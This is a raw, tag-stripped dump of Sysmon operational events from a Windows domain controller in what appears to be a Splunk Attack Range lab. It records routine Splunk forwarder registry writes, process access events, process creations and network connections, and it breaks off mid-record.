Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE2A20F7D59960CC323B3A19F431D3D5,SHA256=C751C774B5829566946D3B915890E4A5B945216F39F6A7B86DC005FFD5AE2DE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:54.986{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91FD65542D10CA25330898A98B6FB301,SHA256=58DCDF79A52243D459348C6182E814E07414AC5AB976AB5640E59645FD22F72F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:56.017{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F5F46448B2611855CAC8E635420FA2E,SHA256=6E072383A8ADB86C7F2AEA39F028C0044C2988B96DCBA77351A9AA1296D29C76,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:55.523{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53692-false10.0.1.12-8000- 23542300x800000000000000010383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:57.032{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30FEA8917683F8272483963CDD22B66F,SHA256=54BE2D49A722EC89B3CB7E0BE1D7E17ED60C667E1BE4E806FDD8CEF1AF9C2773,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:58.032{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=375B8E1126FF4026FBCB452D68DF974A,SHA256=0510541BA36A5A25DD7CE64FF3DE1EB0D1CAFC1ABD123442E5EC3480F1EDD4FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:59.079{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B9C33EB9D4FB1985F9D068072DED0E8,SHA256=5B0C24EECE92EB94E9ADBC684A2C74D6A6CFCC02BA3B2FD0C72ED2B5FFB42904,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:00.110{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31A67D950617861628398DD1089CF8BB,SHA256=91F5E9ED48C1D78F90EF3F22A54FE359B4CCD439978254245FEFB98C11FF93BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:01.109{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=812FA2FAE4D6D4888AD0EBCE9318029D,SHA256=7386FE458674261A125C7EE7E3C107AB0ABD9479C2B7E7EB931CA817B38BFB05,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:02.968{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6622-6064-6001-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:02.968{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:02.968{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:02.968{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:02.968{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:02.968{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6622-6064-6001-00000000AE01}4000C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:02.968{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6622-6064-6001-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:02.969{266CAFBE-6622-6064-6001-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000010390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:01.461{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53693-false10.0.1.12-8000- 23542300x800000000000000010389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:02.140{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3BAFEBD8075DC99EC3E6F73625A409E,SHA256=F78665DC755C42A36D79A4661FDF73ABB2F22666394311BA52C694C421FB81E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:03.765{266CAFBE-6623-6064-6101-00000000AE01}55561156C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:03.609{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6623-6064-6101-00000000AE01}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:03.609{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:03.609{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:03.609{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:03.609{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:03.609{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6623-6064-6101-00000000AE01}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:03.609{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6623-6064-6101-00000000AE01}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:03.610{266CAFBE-6623-6064-6101-00000000AE01}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:03.171{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7A5D47E97FED23CB69B924261E9595F,SHA256=3F0E2CA2AAC23C771117D2C97420F6DF6AD1D23D8EC661DD49D0FC671D4EEDCF,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000010417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:04.718{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6624-6064-6201-00000000AE01}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:04.718{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:04.718{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:04.718{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:04.718{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C